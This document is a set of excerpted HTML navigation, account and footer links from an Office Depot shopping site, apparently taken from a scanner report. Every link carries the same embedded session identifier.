<li><a href="/a/browse/monitors-and-projectors/N=5+509669/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/office-machines/N=5+509740/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Office Machines</a>
...[SNIP]...
<li><a href="/a/browse/calculators/N=5+509745/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Calculators</a>
...[SNIP]...
<li><a href="/a/browse/label-makers-and-tapes/N=5+509760/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Label Makers &amp; Tapes</a>
...[SNIP]...
<li><a href="/a/browse/laminating-machines/N=5+509765/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Laminating Machines</a>
...[SNIP]...
<li><a href="/a/browse/shredders/N=5+509777/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Shredders</a>
...[SNIP]...
<li><a href="/a/browse/office-machines/N=5+509740/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/printers-scanners-copiers-faxes/N=5+509833/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Printers, Scanners, Copiers, Faxes</a>
...[SNIP]...
<li><a href="/a/browse/all-in-ones/N=5+509834/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">All-In-Ones</a>
...[SNIP]...
<li><a href="/a/browse/inkjet-printers/N=5+509855/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Inkjet Printers</a>
...[SNIP]...
<li><a href="/a/browse/laser-printers/N=5+509857/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Laser Printers</a>
...[SNIP]...
<li><a href="/a/browse/wide-format-printers/N=5+509875/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Wide-Format Printers</a>
...[SNIP]...
<li><a href="/a/browse/printers-scanners-copiers-faxes/N=5+509833/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<li>
               <a href="/a/browse/audio-and-video-electronics/N=5+509401/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Audio &amp; Video Electronics</a>
...[SNIP]...
<li>
               <a href="/a/browse/cameras-and-camcorders/N=5+509515/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Cameras &amp; Camcorders</a>
...[SNIP]...
<li>
               <a href="/a/browse/computer-accessories/N=5+509547/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Computer Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/computer-parts-and-upgrades/N=5+509589/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Computer Parts &amp; Upgrades</a>
...[SNIP]...
<li>
               <a href="/a/browse/computers-and-servers/N=5+509612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Computers &amp; Servers</a>
...[SNIP]...
<li>
               <a href="/a/browse/data-storage-and-media/N=5+509625/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Data Storage &amp; Media</a>
...[SNIP]...
<li>
               <a href="/a/browse/ink-toner-and-ribbons/N=5+509666/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Ink, Toner &amp; Ribbons</a>
...[SNIP]...
<li>
               <a href="/a/browse/monitors-and-projectors/N=5+509669/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Monitors &amp; Projectors</a>
...[SNIP]...
<li>
               <a href="/a/browse/networking-and-cables/N=5+509688/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Networking &amp; Cables</a>
...[SNIP]...
<li>
               <a href="/a/browse/office-machines/N=5+509740/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Office Machines</a>
...[SNIP]...
<li>
               <a href="/a/browse/phones-and-accessories/N=5+509793/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Phones &amp; Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/power-protection-and-batteries/N=5+509475/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Power Protection &amp; Batteries</a>
...[SNIP]...
<li>
               <a href="/a/browse/printers-scanners-copiers-faxes/N=5+509833/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Printers, Scanners, Copiers, Faxes</a>
...[SNIP]...
<li>
               <a href="/a/browse/software-and-books/N=5+509895/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Software &amp; Books</a>
...[SNIP]...
<li>
               <a href="/a/browse/warranties-and-services/N=5+509880/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Warranties &amp; Services</a>
...[SNIP]...
<p><a id="v2_nav_technology_1" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15028&redirect=false">$479.99 After $150 Savings on Lenovo Laptop</a>
...[SNIP]...
<p><a id="v2_nav_technology_3" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15030&redirect=false">Tech Depot Services Free PC Check up</a>
...[SNIP]...
<h2>
       <a href="/a/browse/furniture/N=5+917/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1"><span>
...[SNIP]...
<h4><a href="/a/browse/bookcases/N=5+483114/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Bookcases</a>
...[SNIP]...
<li><a href="/a/browse/metal-bookcases/N=5+483117/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Metal Bookcases</a>
...[SNIP]...
<li><a href="/a/browse/wall-units/N=5+501439/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Wall Units</a>
...[SNIP]...
<li><a href="/a/browse/wood-bookcases/N=5+483123/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Wood Bookcases</a>
...[SNIP]...
<li><a href="/a/browse/bookcases/N=5+483114/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/carts-and-stands/N=5+501476/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Carts &amp; Stands</a>
...[SNIP]...
<li><a href="/a/browse/computer-carts/N=5+501479/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Computer Carts</a>
...[SNIP]...
<li><a href="/a/browse/tv-carts-and-stands/N=5+501488/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">TV Carts &amp; Stands</a>
...[SNIP]...
<li><a href="/a/browse/utility-and-book-carts/N=5+501491/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Utility &amp; Book Carts</a>
...[SNIP]...
<li><a href="/a/browse/carts-and-stands/N=5+501476/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/chairs/N=5+501503/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Chairs</a>
...[SNIP]...
<li><a href="/a/browse/folding-and-stacking-chairs/N=5+501504/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Folding &amp; Stacking Chairs</a>
...[SNIP]...
<li><a href="/a/browse/office-chairs/N=5+501507/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Office Chairs</a>
...[SNIP]...
<li><a href="/a/browse/reception-seating/N=5+501516/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Reception Seating</a>
...[SNIP]...
<li><a href="/a/browse/chairs/N=5+501503/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/desks-and-workstations/N=5+501545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Desks &amp; Workstations</a>
...[SNIP]...
<li><a href="/a/browse/commercial-grade-desks/N=5+501546/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Commercial Grade Desks</a>
...[SNIP]...
<li><a href="/a/browse/small-officehome-office-desks/N=5+501556/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Small Office/Home Office Desks</a>
...[SNIP]...
<li><a href="/a/browse/specialty-desking/N=5+501568/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Specialty Desking</a>
...[SNIP]...
<li><a href="/a/browse/desks-and-workstations/N=5+501545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/filing-storage-and-shelving/N=5+501570/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Filing, Storage &amp; Shelving</a>
...[SNIP]...
<li><a href="/a/browse/lateral-file-cabinets/N=5+501573/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Lateral File Cabinets</a>
...[SNIP]...
<li><a href="/a/browse/specialty-filesstorage/N=5+501578/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Specialty Files/Storage</a>
...[SNIP]...
<li><a href="/a/browse/vertical-file-cabinets/N=5+501584/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Vertical File Cabinets</a>
...[SNIP]...
<li><a href="/a/browse/filing-storage-and-shelving/N=5+501570/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/furniture-collections/N=5+501588/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Furniture Collections</a>
...[SNIP]...
<li><a href="/a/browse/christopher-lowell-furniture-collections/N=5+501589/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Christopher Lowell Furniture Collections</a>
...[SNIP]...
<li><a href="/a/browse/modular-furniture-collections/N=5+501802/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Modular Furniture Collections</a>
...[SNIP]...
<li><a href="/a/browse/wood-veneer-furniture-collections/N=5+501822/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Wood Veneer Furniture Collections</a>
...[SNIP]...
<li><a href="/a/browse/furniture-collections/N=5+501588/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<li>
               <a href="/a/browse/bookcases/N=5+483114/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Bookcases</a>
...[SNIP]...
<li>
               <a href="/a/browse/carts-and-stands/N=5+501476/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Carts &amp; Stands</a>
...[SNIP]...
<li>
               <a href="/a/browse/chair-and-floor-mats/N=5+501493/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Chair &amp; Floor Mats</a>
...[SNIP]...
<li>
               <a href="/a/browse/chairs/N=5+501503/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Chairs</a>
...[SNIP]...
<li>
               <a href="/a/browse/desk-and-wall-accessories/N=5+504392/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Desk &amp; Wall Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/desks-and-workstations/N=5+501545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Desks &amp; Workstations</a>
...[SNIP]...
<li>
               <a href="/a/browse/decor-and-accessories/N=5+501525/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Décor &amp; Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/filing-storage-and-shelving/N=5+501570/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Filing, Storage &amp; Shelving</a>
...[SNIP]...
<li>
               <a href="/a/browse/furniture-collections/N=5+501588/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Furniture Collections</a>
...[SNIP]...
<li>
               <a href="/a/browse/lighting/N=5+501877/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Lighting</a>
...[SNIP]...
<li>
               <a href="/a/browse/panel-and-cubicle-systems/N=5+501895/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Panel &amp; Cubicle Systems</a>
...[SNIP]...
<li>
               <a href="/a/browse/safes/N=5+501903/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Safes</a>
...[SNIP]...
<li>
               <a href="/a/browse/tables/N=5+501910/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Tables</a>
...[SNIP]...
<p><a id="v2_nav_furniture_1" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15031&redirect=false">$79.99 Save $40 True Innovations Mesh Mid-Back Chair</a>
...[SNIP]...
<h2><a href="/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1"><span>
...[SNIP]...
<h4><a href="/a/browse/custom-printing/N=5+2930/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Custom Printing</a>
...[SNIP]...
<li><a href="/a/browse/business-cards/N=5+2949/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business Cards</a>
...[SNIP]...
<li><a href="/a/browse/stamps-and-daters/N=5+3034/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Stamps & Daters</a>
...[SNIP]...
<li><a href="/a/browse/stationery/N=5+2930+378259/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Stationery</a>
...[SNIP]...
<li><a href="/a/browse/custom-printing/N=5+2930/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Promotional Products</a>
...[SNIP]...
<li><a href="/a/browse/business-and-desk/N=5+4800/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business & Desk</a>
...[SNIP]...
<li><a href="/a/browse/custom-pens-and-pencils/N=5+5276/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Pens & Pencils</a>
...[SNIP]...
<li><a href="/a/browse/custom-drinkware/N=5+4970/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Drinkware</a>
...[SNIP]...
<li><a href="/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business Resource Center</a>
...[SNIP]...
<li><a href="/a/design-print-and-ship/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Document & Copy Services</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/content/businesstools/forms/default.jsp" class="">Business Form Templates</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/content/businesstools/sbh/default.jsp" class="">Small Business Handbook</a>
...[SNIP]...
<li><a href="/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/security-solutions/N=5+8612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Security Solutions</a>
...[SNIP]...
<li><a href="/shred;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">In-Store Shredding Service</a>
...[SNIP]...
<li><a href="/a/browse/property-damage-solutions/N=5+319645/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Property Damage Protection</a>
...[SNIP]...
<li><a href="/a/browse/solutions-for-prevention-of-online-threats/N=5+510451/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Prevention of Online Threats</a>
...[SNIP]...
<li><a href="/a/browse/security-solutions/N=5+8612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/promo/pages/0928_tech/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Tech Depot Services</a>
...[SNIP]...
<li><a href="/a/browse/repair-upgrade-services/N=5+509889/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Repair & Upgrade Your Computer</a>
...[SNIP]...
<li><a href="/a/browse/network-services/N=5+509887/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Connect Your Wireless Network</a>
...[SNIP]...
<li><a href="/a/promo/pages/0928_tech/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/odservicesBody.jsp&template=customerservice" class="">Partner Services</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/partners/fax2mail.jsp" class="">Fax Via Email</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/partners/bbnational.jsp" class="">High Speed Internet</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0127_google.jsp" class="">Google Business Resource Center</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/odservicesBody.jsp&template=customerservice" class="see_all">See all</a>
...[SNIP]...
<li class=""><a href="/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Business Resource Center</a>
...[SNIP]...
<li><a href="/a/browse/custom-printing/N=5+2930/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Custom Printing</a>
...[SNIP]...
<li><a href="/a/design-print-and-ship/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Copy & Print Depot</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/odservicesBody.jsp&template=customerservice">Partner Services</a>
...[SNIP]...
<li><a href="/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Promotional Products</a>
...[SNIP]...
<li><a href="/a/browse/security-solutions/N=5+8612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Security Solutions</a>
...[SNIP]...
<li><a href="/a/promo/pages/0928_tech/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Tech Depot Services</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0928_recycling.jsp&template=customerservice">Tech Recycling</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/webcafe/main.jsp">Webcafe</a>
...[SNIP]...
<h2>
       
           
                                                   <a href="https://www.officedepot.com/account/accountSummaryDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1 accountLogin">My Account</a>
...[SNIP]...
<li>
                   
                   
                   <a href="https://www.officedepot.com/account/accountSummaryDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="accountLogin">My Account Overview</a>
...[SNIP]...
<li>
                       <a href="https://www.officedepot.com/account/editContactDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847522&jvalidator=5W7oKmVCxwu%2BVdepVt1BMw%3D%3D" class="accountLogin">Account Settings</a>
...[SNIP]...
<li>
                               <a href="https://www.officedepot.com/orderhistory/orderHistoryList.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Order Tracking/History</a>
...[SNIP]...
<li>
                       <a href="https://www.officedepot.com/account/editBillingDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="accountLogin">Payment Preferences</a>
...[SNIP]...
<li>
                       <a href="https://www.officedepot.com/account/shippingListDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="accountLogin">Address Book</a>
...[SNIP]...
<li>
                           <a href="/csl/listAll.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847523&jvalidator=euDUVKp%2Bb%2BhWjIe7QTbpVw%3D%3D" class="accountLogin">Shopping Lists</a>
...[SNIP]...
<li>
                           <a href="https://www.officedepot.com/orderhistory/submitReturn.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?searchFromDate=12/26/2010&searchToDate=01/25/2011" class="accountLogin">Submit Return</a>
...[SNIP]...
<li class="first"><a href="/a/ink-toner-and-ribbons/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Ink & Toner</a>
...[SNIP]...
<li><a href="/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Paper</a>
...[SNIP]...
<li id='seeAll'>
                       <a href="/catalog/AZ.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">View All Products A-Z</a>
...[SNIP]...
<li class=""><a href="https://www.officedepot.com/orderhistory/orderHistoryAnonDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Order Tracking</a>
...[SNIP]...
<li class="map"><a href="/a/site-map/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Visit Site Map</a>
...[SNIP]...
<span id='exploreSmartShopping'><a id="azAd2" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=10207&redirect=false">Products by Name</a>
...[SNIP]...
<span id='pppAndLeasingOptions'><a id="azAd3" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=10206&redirect=false" onclick="window.open('/adRedir.do?ciid=10206&redirect=false','OfficeDepot','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=1,resizable=1,width=520,height=520');return false" TARGET=_BLANK>Product Plans & Leasing Options</a>
...[SNIP]...
<div id="siteBreadcrumb">
    <a href="/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Home</a>
...[SNIP]...
<h5><a href="/purchaseGiftCard.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Gift Cards</a>
...[SNIP]...
<p><a href="/purchaseGiftCard.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Buy a Gift Card</a>
...[SNIP]...
<h5><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/creditcard/creditcard.jsp" class="">Credit Cards</a>
...[SNIP]...
<p><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/creditcard/creditcard.jsp" class="">Learn More</a>
...[SNIP]...
<h5><a href="/account/alertsDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Smart Email Deals</a>
...[SNIP]...
<p><a href="/account/alertsDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Sign-up Now!</a>
...[SNIP]...
<span><a href="/a/promo/pages/0711_mobile/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" target="_blank" class="">Mobile Alerts</a>
...[SNIP]...
<li class=""><a href="/a/site-map/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Site Map</a></li>
<li><a href="/a/top-categories/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Top Categories</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/international/international.jsp&template=companyInfo">International</a>
...[SNIP]...
<li><a href="/espanol;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Office Depot en Español</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/termsofuse.jsp&template=customerService">Terms of Use</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/termsofuse.jsp&template=customerService#l1">Mobile Terms of Use</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/Privacy.jsp&template=customerService">Privacy Policy</a>
...[SNIP]...
<li class=""><a href="/storelocator/input.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Store Locator</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/default.jsp&template=companyInfo">Company Overview</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/index.jsp&template=companyInfo" target='_blank'>About Office Depot..</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/affiliateprogram.jsp&template=companyInfo">Affiliate Program</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/govprogram.jsp&template=companyInfo">Government Programs</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/diversitymissionstatement.jsp&template=companyInfo">Diversity</a>
...[SNIP]...
<li><a href="/renderStaticPage.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/womeninbiz/index.jsp&template=companyInfo">Women in Business</a>
...[SNIP]...
<li><a href="/environment;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" target='_blank'>Environmental Programs</a>
...[SNIP]...
<li><a href="/videogallery;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Video Gallery</a>
...[SNIP]...
<li class=""><a href="/customerservice/index.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Customer Service</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/Refunds.jsp&template=customerService">Refunds and Exchanges</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/customerservice/customerServiceDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Contact Us</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/orderhistory/orderHistoryList.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Order Tracking</a>
...[SNIP]...
